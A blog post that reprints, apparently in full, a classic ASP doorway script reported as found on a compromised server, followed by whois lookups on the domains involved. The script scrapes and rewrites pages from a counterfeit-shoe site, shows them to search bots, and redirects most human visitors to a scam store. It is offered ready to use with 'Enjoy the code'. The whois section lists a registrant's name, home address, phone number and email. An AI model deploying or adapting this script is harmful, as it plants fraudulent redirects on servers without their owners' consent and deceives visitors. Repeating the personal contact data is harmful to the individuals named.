Today I’ll show you a script written in classic ASP that can use some server vulnerability to provide traffic from an unaware website to another one through another unaware server.
It’s quite simple, so I’m not going to explain it in details.
This malicious code was founded on a server, and is provided as it is (I didn’t change or hide the malicious recipient) and is provided for solely educational purpose.
The educational purpose is related basically to the creation of an HTML Parser or XML Parser in classic ASP and I’ll also show other ASP functions examples.
Classic ASP
This file is called “airmaxonline2014wszat.asp” but on the victim server there where many similars in many folders with different names. Also you can save it with the name you prefer.
What changes in each file?
Basically the only 3 variables that changes are “fromsite“, “tourl” and “pageid“. “Jumptodomain” si always the same since the purpose of the operation is to bring traffic always to the same website.
Note how filename (and obviously tourl) sound like fromsite to have a better impact on referral analysis.
A more tricky aspect to avoid to have just a simple blank page that redirect to the target website is to get the HTML of the middle-tier web page so that on the it seems a real exitant full-of-contents page.
Enjoy the code.
<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<%
On Error Resume Next
dim jumptodomain, imagefolder, fromsite, tourl
jumptodomain = "www.ebrandshoe.com"
fromsite = "http://www.airmaxonline2014.com/"
tourl ="http://www.foo.com/airmaxonline2014wszat.asp"
pageid = "airmaxonline2014"
imagefolder = "images/"
tourl = tourl&"?"&pageid&"="
Function GetLocationURL()
Dim Url
Dim ServerPort,ServerName,ScriptName,QueryString
ServerName = Request.ServerVariables("SERVER_NAME")
ServerPort = Request.ServerVariables("SERVER_PORT")
ScriptName = Request.ServerVariables("SCRIPT_NAME")
QueryString = Request.ServerVariables("QUERY_STRING")
Url="http://"&ServerName
If ServerPort <> "80" Then Url = Url & ":" & ServerPort
Url=Url&ScriptName
If QueryString <>"" Then Url=Url&"?"& QueryString
GetLocationURL=Server.URLEncode(Url)
End Function
Function GetCode(str,regstr)
Dim Reg,serStr,Cols
Set Reg= new RegExp
Reg.IgnoreCase = True
Reg.MultiLine = True
Reg.Pattern =regstr
If Reg.test(str) Then
Set Cols = Reg.Execute(str)
GetCode=Cols(0).SubMatches(0)
Else
GetCode=""
End If
Set Cols = Nothing
Set Reg = Nothing
End Function
%>
<%
on error resume next
Function getHTTPPage(URL)
Set HTTPReq = Server.createobject("Msxml2.XMLHTTP")
HTTPReq.Open "GET", URL, False
HTTPReq.send
If HTTPReq.readyState <> 4 Then Exit Function
getHTTPPage = Bytes2bStr(HTTPReq.responseBody)
Set HTTPReq = Nothing
End Function
Function Bytes2bStr(vin)
Dim BytesStream,StringReturn
Set BytesStream = Server.CreateObject("ADODB.Stream")
BytesStream.Type = 2
BytesStream.Open
BytesStream.WriteText vin
BytesStream.Position = 0
BytesStream.Charset = "UTF-8"
BytesStream.Position = 2
StringReturn =BytesStream.ReadText
BytesStream.close
Set BytesStream = Nothing
Bytes2bStr = StringReturn
End Function
if request(pageid)<>"" then
htmls = getHTTPPage(fromsite&request(pageid))
htmls = replace(htmls,""&chr(34)&fromsite,""&chr(34)&"/")
htmls = replace(htmls,""&chr(34)&"/"&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls = replace(htmls,""&chr(34)&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls = replace(htmls,""&chr(34)&"/includes/",""&chr(34)&fromsite&"includes/")
htmls = replace(htmls,""&chr(34)&"includes/",""&chr(34)&fromsite&"includes/")
htmls = replace(htmls,""&chr(34)&"/media/",""&chr(34)&fromsite&"media/")
htmls = replace(htmls,""&chr(34)&"media/",""&chr(34)&fromsite&"media/")
htmls = replace(htmls,""&chr(34)&"/skin/",""&chr(34)&fromsite&"skin/")
htmls = replace(htmls,""&chr(34)&"js/",""&chr(34)&fromsite&"skin/")
htmls = replace(htmls,""&chr(34)&"/js/",""&chr(34)&fromsite&"js/")
htmls = replace(htmls,""&chr(34)&"skin/",""&chr(34)&fromsite&"js/")
htmls = replace(htmls,"href="&chr(34),"href="&chr(34)&"/")
htmls = replace(htmls,"href="&chr(34)&"//","href="&chr(34)&"/")
htmls = replace(htmls,"href="&chr(34)&"/http","href="&chr(34)&"http")
htmls = replace(htmls,"href="&chr(34)&"/","href="&chr(34)&tourl)
else
htmls = getHTTPPage(fromsite)
htmls = replace(htmls,""&chr(34)&fromsite,""&chr(34)&"/")
htmls = replace(htmls,""&chr(34)&"/"&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls = replace(htmls,""&chr(34)&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls = replace(htmls,""&chr(34)&"/includes/",""&chr(34)&fromsite&"includes/")
htmls = replace(htmls,""&chr(34)&"includes/",""&chr(34)&fromsite&"includes/")
htmls = replace(htmls,""&chr(34)&"/media/",""&chr(34)&fromsite&"media/")
htmls = replace(htmls,""&chr(34)&"media/",""&chr(34)&fromsite&"media/")
htmls = replace(htmls,""&chr(34)&"/skin/",""&chr(34)&fromsite&"skin/")
htmls = replace(htmls,""&chr(34)&"js/",""&chr(34)&fromsite&"skin/")
htmls = replace(htmls,""&chr(34)&"/js/",""&chr(34)&fromsite&"js/")
htmls = replace(htmls,""&chr(34)&"skin/",""&chr(34)&fromsite&"js/")
htmls = replace(htmls,"href="&chr(34),"href="&chr(34)&"/")
htmls = replace(htmls,"href="&chr(34)&"//","href="&chr(34)&"/")
htmls = replace(htmls,"href="&chr(34)&"/http","href="&chr(34)&"http")
htmls = replace(htmls,"href="&chr(34)&"/","href="&chr(34)&tourl)
end if
dim pagetitle
pagetitle = GetCode(htmls,"(.*?)<\/title>")
pagetitle = Server.URLEncode(pagetitle)
dim agent,language,referer
agent=request.servervariables("http_user_agent")
language=request.servervariables("HTTP_ACCEPT_LANGUAGE")
referer=request.servervariables("HTTP_REFERER")
if language = "" and referer = "" then
if InStr(agent, "bot")<=0 then Response.Redirect "http://"&jumptodomain&"/?from="&GetLocationURL()&"&q="&pagetitle Response.End end if else Response.Redirect "http://"&jumptodomain&"/?from="&GetLocationURL()&"&q="&pagetitle Response.End end if response.write htmls %>
Of course it is natural to be courious about who tried to claim the benefit of this pages and anyone can performe a whois request on the two domains to know more about them. To make you a favour I’m just copying here what the whois returned to me so that you can save time.
The scammer:
Registrant Org MING AI is associated with ~22 other domains Registrar GODADDY.COM, LLC Registrar Status clientDeleteProhibited, clientRenewProhibited, clientTransferProhibited, clientUpdateProhibited Dates Created on 2014-07-22 - Expires on 2015-07-22 - Updated on 2014-08-18 Name Server(s) F1G1NS1.DNSPOD.NET (has 1,672,713 domains) F1G1NS2.DNSPOD.NET (has 1,672,713 domains) IP Address 109.235.50.202 - 12 other sites hosted on this server IP Location Netherlands - Utrecht - Houten - Xeneurope Vps Services ASN Netherlands AS47869 NETROUTING-AS Netrouting,NL (registered Sep 09, 2008) Domain Status Registered And Active Website Whois History 11 records have been archived since 2011-05-14 IP History 5 changes on 5 unique IP addresses over 3 years Registrar History 1 registrar with 1 drop Hosting History 4 changes on 3 unique name servers over 3 years Whois Server whois.godaddy.com Website Website Title EBrandShoe - Cheap NIKE - JUST DO IT, Enjoy buying cheap nike air max, nike free,nike air max ireland store are discount price and 100% quality goods! Server Type Apache/2.2.15 Response Code 200 SEO Score 83% Terms 3073 (Unique: 348, Linked: 2788) Images 48 (Alt tags missing: 15) Links 771 (Internal: 771, Outbound: 0) Whois Record ( last updated on 2014-08-28 ) Domain Name: EBRANDSHOE.COM Registrar URL: http://www.godaddy.com Registrant Name: MING AI Registrant Organization: Name Server: F1G1NS1.DNSPOD.NET Name Server: F1G1NS2.DNSPOD.NET DNSSEC: unsigned
The (unaware?) supporter:
airmaxonline2014.com | Domain Informations Updated : 2014-06-12 Air Max Online 2014 Airmaxonline2014 airmaxonline2014.com Technicals Datas Page Rank : N/A IP : 94.242.255.127 IP-based Geolocation of Airmaxonline2014.com : Luxembourg IP-based Coordinate : latitude : 49.75 | longitude : 6.17 Status : Online (New) Domain Name: AIRMAXONLINE2014.COM Registry Domain ID: 1855988301_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.enom.com Registrar URL: www.enom.com Updated Date: 2014-04-24 03:37:24Z Creation Date: 2014-04-24 10:37:00Z Registrar Registration Expiration Date: 2015-04-24 10:37:00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Registrar Abuse Contact Email: abuse@enom.com Registrar Abuse Contact Phone: +1.4252744500 Domain Status: clientTransferProhibited Registry Registrant ID: Registrant Name: TIAN JING Registrant Organization: Registrant Street: NO.516, XIBALIWA, SHIZHONGQU Registrant City: JINAN Registrant State/Province: SHANDONG Registrant Postal Code: 250002 Registrant Country: CN Registrant Phone: +86.5132973673 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: NHURIE@SINA.COM Registry Admin ID: Admin Name: TIAN JING Admin Organization: Admin Street: NO.516, XIBALIWA, SHIZHONGQU Admin City: JINAN Admin State/Province: SHANDONG Admin Postal Code: 250002 Admin Country: CN Admin Phone: +86.5132973673 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: NHURIE@SINA.COM Registry Tech ID: Tech Name: TIAN JING Tech Organization: Tech Street: NO.516, XIBALIWA, SHIZHONGQU Tech City: JINAN Tech State/Province: SHANDONG Tech Postal Code: 250002 Tech Country: CN Tech Phone: +86.5132973673 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: NHURIE@SINA.COM Name Server: DNS1.NAME-SERVICES.COM Name Server: DNS2.NAME-SERVICES.COM Name Server: DNS3.NAME-SERVICES.COM Name Server: DNS4.NAME-SERVICES.COM Name Server: DNS5.NAME-SERVICES.COM DNSSEC: unSigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ Last update of WHOIS database: 2014-04-24 03:37:24Z